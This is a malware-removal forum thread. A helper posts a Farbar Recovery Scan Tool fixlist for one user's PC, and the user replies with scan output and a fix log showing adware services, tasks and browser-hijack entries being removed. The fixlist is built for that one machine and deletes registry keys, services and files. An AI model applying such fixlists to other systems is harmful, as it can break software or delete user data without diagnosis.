Posted 13 March 2017 - 02:57 PM

Hi stipess

 

Here is the fixlist. Do the same as before, but save it with Unicode encoding:
  • Open Notepad and paste the text.
  • Click File at the top and choose Save as...
  • At the bottom right select Encoding: Unicode and click Save.

 

CloseProcesses:
EmptyTemp:
Hosts:
ExportKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{773A4DAA-2970-4728-BF16-43941A803408}
C:\ProgramData\ApphserftoH
C:\Program Files (x86)\Werbering Configuration
C:\Program Files (x86)\amulell
C:\Users\stipe\AppData\Roaming\Kyubey
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\...\Run: [YWPack] => regsvr32.exe C:\Users\stipe\AppData\Local\YWPack\dglxyttq.dll <===== ATTENTION
HKLM\...\Providers\9i0hqj4q: C:\Program Files (x86)\Werbering Configuration\local64spl.dll
AppInit_DLLs: C:\ProgramData\ApphserftoH\Ronis.dll => C:\ProgramData\ApphserftoH\Ronis.dll [358912 2017-03-10] ()
AppInit_DLLs-x32: C:\ProgramData\ApphserftoH\White-Flex.dll => C:\ProgramData\ApphserftoH\White-Flex.dll [248320 2017-03-10] ()
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
Edge HomeButtonPage: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
R2 ApphserftoH; C:\ProgramData\\ApphserftoH\\ApphserftoH.exe [1125376 2017-03-10] () [File not signed]
R2 WinSAPSvc; C:\Users\stipe\AppData\Roaming\WinSAPSvc\WinSAP.dll [184832 2017-03-10] (Windows) [File not signed]
R2 WinSnare; C:\Users\stipe\AppData\Roaming\WinSnare\WinSnare.dll [776704 2017-03-10] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 ed2kidle; "C:\Program Files (x86)\amulell\ed2k.exe" -downloadwhenidle [X]
S2 Kyubey; C:\Users\stipe\AppData\Roaming\Kyubey\Kyubey.exe -s [X]
2017-03-10 18:34 - 2017-03-10 18:34 - 00000000 ____D C:\Users\stipe\AppData\Local\Ghetutainantigh
2017-03-10 18:34 - 2017-03-10 18:34 - 00000000 ____D C:\Program Files (x86)\Anobert
2017-03-10 18:33 - 2017-03-10 18:46 - 00000000 ____D C:\Users\stipe\AppData\Local\FindIp
2017-03-10 16:31 - 2017-03-10 16:32 - 00003680 _____ C:\Windows\System32\Tasks\Milimili
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Users\stipe\AppData\Roaming\WinSnare
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Users\stipe\AppData\Roaming\WinSAPSvc
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Program Files (x86)\MIO
2017-03-10 16:27 - 2017-03-10 16:32 - 00000000 ____D C:\Program Files (x86)\MK
2017-03-10 16:26 - 2017-03-10 16:26 - 00000000 ____D C:\Program Files (x86)\{B4CE4BCE-D0F4-4561-AB38-F33763AB7BEA}
2017-03-02 02:08 - 2017-03-02 02:09 - 03588743 _____ C:\Users\stipe\Downloads\drive-download-20170302T010841Z-001.zip
2017-02-22 00:30 - 2017-02-22 00:30 - 00003212 _____ C:\Windows\System32\Tasks\{BEA1DF75-CB48-4C32-B944-A3BB20E26AAD}
2017-02-17 08:26 - 2017-02-17 08:26 - 00000000 ____D C:\Users\stipe\AppData\Roaming\Easeware
2017-02-09 18:08 - 2017-02-09 18:08 - 00000000 ____D C:\Windows\system32\˙˙˙˙˙˙˙˙
Task: {B4598892-12B4-4458-9072-A672F8AB6DDB} - \{26474B21-8F86-490C-859C-F4966862DDFB} -> No File <==== ATTENTION
Task: {B544AD48-18DE-4441-B1F9-CF3C3BE5014F} - \Online Application Guardian -> No File <==== ATTENTION
Task: {BA8CD433-71DD-4492-9D78-BFCC7ADBC82D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2016-12-28] ()
Task: {BB82AE49-47B7-437A-B4B4-C356EA136A07} - \Online Application Updater -> No File <==== ATTENTION
Task: {D9F5FF7B-743F-443B-989E-4CE27064FAD0} - \Online Application v209 -> No File <==== ATTENTION
Task: {EEDFB7AD-8B64-415B-B80E-1CDF8073A90E} - \Online Application v209 Guard -> No File <==== ATTENTION
ShortcutWithArgument: C:\Users\stipe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833


Member of the Bleeping Computer A.I.I. early response team!


#13 stipess

stipess
  • Topic Starter

  • Members
  • 34 posts

Posted 13 March 2017 - 05:09 PM

From CKScanner - 

CKScanner 2.5 - Additional Security Risks - These are not necessarily bad
c:\users\stipe\documents\my games\galciv3\hotkeys.ini
c:\users\stipe\downloads\sony vegas pro 13.0 build 453 (x64) + patch di\keygen & patch by di\keygen.zip
scanner sequence 3.LB.11.TMAAAA
 ----- EOF ----- 

Fixlog - 

Fix result of Farbar Recovery Scan Tool (x64) Version: 13-03-2017
Ran by stipe (13-03-2017 22:50:46) Run:3
Running from C:\Users\stipe\Desktop\New folder (4)
Loaded Profiles: stipe (Available Profiles: defaultuser0 & stipe)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
EmptyTemp:
Hosts:
ExportKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{773A4DAA-2970-4728-BF16-43941A803408}
C:\ProgramData\ApphserftoH
C:\Program Files (x86)\Werbering Configuration
C:\Program Files (x86)\amulell
C:\Users\stipe\AppData\Roaming\Kyubey
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\...\Run: [YWPack] => regsvr32.exe C:\Users\stipe\AppData\Local\YWPack\dglxyttq.dll <===== ATTENTION
HKLM\...\Providers\9i0hqj4q: C:\Program Files (x86)\Werbering Configuration\local64spl.dll
AppInit_DLLs: C:\ProgramData\ApphserftoH\Ronis.dll => C:\ProgramData\ApphserftoH\Ronis.dll [358912 2017-03-10] ()
AppInit_DLLs-x32: C:\ProgramData\ApphserftoH\White-Flex.dll => C:\ProgramData\ApphserftoH\White-Flex.dll [248320 2017-03-10] ()
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
Edge HomeButtonPage: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
R2 ApphserftoH; C:\ProgramData\\ApphserftoH\\ApphserftoH.exe [1125376 2017-03-10] () [File not signed]
R2 WinSAPSvc; C:\Users\stipe\AppData\Roaming\WinSAPSvc\WinSAP.dll [184832 2017-03-10] (Windows) [File not signed]
R2 WinSnare; C:\Users\stipe\AppData\Roaming\WinSnare\WinSnare.dll [776704 2017-03-10] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 ed2kidle; "C:\Program Files (x86)\amulell\ed2k.exe" -downloadwhenidle [X]
S2 Kyubey; C:\Users\stipe\AppData\Roaming\Kyubey\Kyubey.exe -s [X]
2017-03-10 18:34 - 2017-03-10 18:34 - 00000000 ____D C:\Users\stipe\AppData\Local\Ghetutainantigh
2017-03-10 18:34 - 2017-03-10 18:34 - 00000000 ____D C:\Program Files (x86)\Anobert
2017-03-10 18:33 - 2017-03-10 18:46 - 00000000 ____D C:\Users\stipe\AppData\Local\FindIp
2017-03-10 16:31 - 2017-03-10 16:32 - 00003680 _____ C:\Windows\System32\Tasks\Milimili
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Users\stipe\AppData\Roaming\WinSnare
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Users\stipe\AppData\Roaming\WinSAPSvc
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Program Files (x86)\MIO
2017-03-10 16:27 - 2017-03-10 16:32 - 00000000 ____D C:\Program Files (x86)\MK
2017-03-10 16:26 - 2017-03-10 16:26 - 00000000 ____D C:\Program Files (x86)\{B4CE4BCE-D0F4-4561-AB38-F33763AB7BEA}
2017-03-02 02:08 - 2017-03-02 02:09 - 03588743 _____ C:\Users\stipe\Downloads\drive-download-20170302T010841Z-001.zip
2017-02-22 00:30 - 2017-02-22 00:30 - 00003212 _____ C:\Windows\System32\Tasks\{BEA1DF75-CB48-4C32-B944-A3BB20E26AAD}
2017-02-17 08:26 - 2017-02-17 08:26 - 00000000 ____D C:\Users\stipe\AppData\Roaming\Easeware
2017-02-09 18:08 - 2017-02-09 18:08 - 00000000 ____D C:\Windows\system32\˙˙˙˙˙˙˙˙
Task: {B4598892-12B4-4458-9072-A672F8AB6DDB} - \{26474B21-8F86-490C-859C-F4966862DDFB} -> No File <==== ATTENTION
Task: {B544AD48-18DE-4441-B1F9-CF3C3BE5014F} - \Online Application Guardian -> No File <==== ATTENTION
Task: {BA8CD433-71DD-4492-9D78-BFCC7ADBC82D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2016-12-28] ()
Task: {BB82AE49-47B7-437A-B4B4-C356EA136A07} - \Online Application Updater -> No File <==== ATTENTION
Task: {D9F5FF7B-743F-443B-989E-4CE27064FAD0} - \Online Application v209 -> No File <==== ATTENTION
Task: {EEDFB7AD-8B64-415B-B80E-1CDF8073A90E} - \Online Application v209 Guard -> No File <==== ATTENTION
ShortcutWithArgument: C:\Users\stipe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
*****************

Processes closed successfully.
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
================== ExportKey: ===================

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{773A4DAA-2970-4728-BF16-43941A803408}" => not found

=== End of ExportKey ===
C:\ProgramData\ApphserftoH => moved successfully
"C:\Program Files (x86)\Werbering Configuration" => not found.
C:\Program Files (x86)\amulell => moved successfully
C:\Users\stipe\AppData\Roaming\Kyubey => moved successfully
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Windows\CurrentVersion\Run\\YWPack => value removed successfully
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\9i0hqj4q => key removed successfully
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order 9i0hqj4q => removed successfully
"C:\ProgramData\ApphserftoH\Ronis.dll" => Value data not found.
"C:\ProgramData\ApphserftoH\White-Flex.dll" => Value data not found.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Error setting value.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Error setting value.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Error setting value.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Error setting value.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Error setting value.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Error setting value.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected
HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found. 
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found. 
HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => value restored successfully
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\\HomeButtonPage => value removed successfully
HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command\\Default => value restored successfully
HKLM\System\CurrentControlSet\Services\ApphserftoH => key removed successfully
ApphserftoH => service removed successfully
HKLM\System\CurrentControlSet\Services\WinSAPSvc => key removed successfully
WinSAPSvc => service removed successfully
WinSnare => Unable to stop service.
HKLM\System\CurrentControlSet\Services\WinSnare => key removed successfully
WinSnare => service removed successfully
HKLM\System\CurrentControlSet\Services\ed2kidle => key removed successfully
ed2kidle => service removed successfully
HKLM\System\CurrentControlSet\Services\Kyubey => key removed successfully
Kyubey => service removed successfully
C:\Users\stipe\AppData\Local\Ghetutainantigh => moved successfully
C:\Program Files (x86)\Anobert => moved successfully
C:\Users\stipe\AppData\Local\FindIp => moved successfully
C:\Windows\System32\Tasks\Milimili => moved successfully
C:\Users\stipe\AppData\Roaming\WinSnare => moved successfully
C:\Users\stipe\AppData\Roaming\WinSAPSvc => moved successfully
C:\Program Files (x86)\MIO => moved successfully
C:\Program Files (x86)\MK => moved successfully
C:\Program Files (x86)\{B4CE4BCE-D0F4-4561-AB38-F33763AB7BEA} => moved successfully
C:\Users\stipe\Downloads\drive-download-20170302T010841Z-001.zip => moved successfully
C:\Windows\System32\Tasks\{BEA1DF75-CB48-4C32-B944-A3BB20E26AAD} => moved successfully
C:\Users\stipe\AppData\Roaming\Easeware => moved successfully
C:\Windows\system32\˙˙˙˙˙˙˙˙ => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B4598892-12B4-4458-9072-A672F8AB6DDB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B4598892-12B4-4458-9072-A672F8AB6DDB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{26474B21-8F86-490C-859C-F4966862DDFB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B544AD48-18DE-4441-B1F9-CF3C3BE5014F} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B544AD48-18DE-4441-B1F9-CF3C3BE5014F} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application Guardian => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BA8CD433-71DD-4492-9D78-BFCC7ADBC82D} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA8CD433-71DD-4492-9D78-BFCC7ADBC82D} => key removed successfully
C:\Windows\System32\Tasks\Milimili => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BB82AE49-47B7-437A-B4B4-C356EA136A07} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BB82AE49-47B7-437A-B4B4-C356EA136A07} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application Updater => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D9F5FF7B-743F-443B-989E-4CE27064FAD0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D9F5FF7B-743F-443B-989E-4CE27064FAD0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application v209 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EEDFB7AD-8B64-415B-B80E-1CDF8073A90E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EEDFB7AD-8B64-415B-B80E-1CDF8073A90E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application v209 Guard => key removed successfully
C:\Users\stipe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Shortcut argument removed successfully.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => Shortcut argument removed successfully.
C:\Users\Public\Desktop\Google Chrome.lnk => Shortcut argument removed successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 32768 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 23582406 B
Java, Flash, Steam htmlcache => 212869382 B
Windows/system/drivers => 23671882 B
Edge => 9216 B
Chrome => 468110406 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 15 B
systemprofile32 => 11982221 B
LocalService => 0 B
NetworkService => 8626 B
defaultuser0 => 0 B
stipe => 605441811 B

RecycleBin => 423682168 B
EmptyTemp: => 1.6 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 13-03-2017 22:55:48)


Result of scheduled keys to remove after reboot:

HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected
